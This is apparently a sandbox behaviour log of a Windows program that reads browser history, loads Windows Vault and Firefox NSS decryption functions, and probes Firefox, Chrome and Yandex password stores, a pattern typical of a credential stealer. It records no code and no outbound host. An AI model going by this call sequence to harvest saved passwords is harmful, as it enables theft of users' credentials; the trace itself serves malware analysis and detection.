Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = FirefoxProfileFolder	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = FirefoxInstallFolder	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = ChromeProfileFolder	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = OperaPasswordFile	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = WinPos	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = Columns	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = Sort, default_value = 0	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32	1	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	2	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	2	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 384, size_out = 384	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	11	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	4	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	8	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256	54	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8	14	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat, size = 32, size_out = 32	1	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat, size = 8, size_out = 8	93	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat, size = 32, size_out = 32	1	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat, size = 8, size_out = 8	64	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32	1	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8	69	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 32, size_out = 32	1	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat, size = 8, size_out = 8	93	Fn Data
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 32, size_out = 32	1	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8	94	Fn Data
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes	1	Fn
Module	Load	module_name = pstorec.dll, base_address = 0x74150000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x7415526c	1	Fn
Module	Load	module_name = vaultcli.dll, base_address = 0x740e0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\vaultcli.dll, function = VaultOpenVault, address_out = 0x740e26a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\vaultcli.dll, function = VaultCloseVault, address_out = 0x740e2718	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x740e3099	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\vaultcli.dll, function = VaultFree, address_out = 0x740e4321	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetInformation, address_out = 0x740e24c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetItem, address_out = 0x740e3242	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0	1	Fn
Registry	Open Key	reg_name = Mozilla Firefox\bin	1	Fn
Registry	Enumerate Keys	-	1	Fn
Registry	Open Key	reg_name = Mozilla Firefox 25.0\bin	1	Fn
Registry	Read Value	reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes	1	Fn
Registry	Enumerate Keys	-	1	Fn
Module	Get Handle	module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x73eb0000	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x73f6d70b	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x73f6d13c	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73f03c51	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x73f03333	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x73eecbc4	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x73eed3ca	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x73f000a7	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = file_attributes	1	Fn
Registry	Open Key	reg_name = Mozilla Firefox\bin	1	Fn
Registry	Enumerate Keys	-	1	Fn
Registry	Open Key	reg_name = Mozilla Firefox 25.0\bin	1	Fn
Registry	Read Value	reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes	1	Fn
Registry	Enumerate Keys	-	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll, type = file_attributes	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll, type = file_attributes	1	Fn
Module	Get Handle	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x73eb0000	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x74011ca0	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x73f9ce70	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x74005200	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x73fbd400	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x73fbd3a0	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x73fbd3d0	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x73fe9f60	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x73febde0	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x73fea270	1	Fn
Registry	Open Key	reg_name = Mozilla Firefox\bin	1	Fn
Registry	Enumerate Keys	-	1	Fn
Registry	Open Key	reg_name = Mozilla Firefox 25.0\bin	1	Fn
Registry	Read Value	reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes	1	Fn
Registry	Enumerate Keys	-	1	Fn
Module	Get Handle	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x73eb0000	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x73f6d70b	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x73f6d13c	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x73f03c51	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x73f03333	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x73eecbc4	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x73eed3ca	1	Fn
Module	Get Address	module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x73f000a7	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = QueryFullProcessImageNameW, address_out = 0x75a115f7	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x75a1d60f	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Get filename	file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Get filename	file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Get filename	file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes	1	Fn
File	Get Info	filename = C:\Program Files (x86)\Sea Monkey\nss3.dll, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data, type = file_attributes	1	Fn
File	Get Info	type = size, size_out = 0	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data, type = file_attributes	1	Fn
File	Get Info	type = size, size_out = 0	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data, type = file_attributes	1	Fn
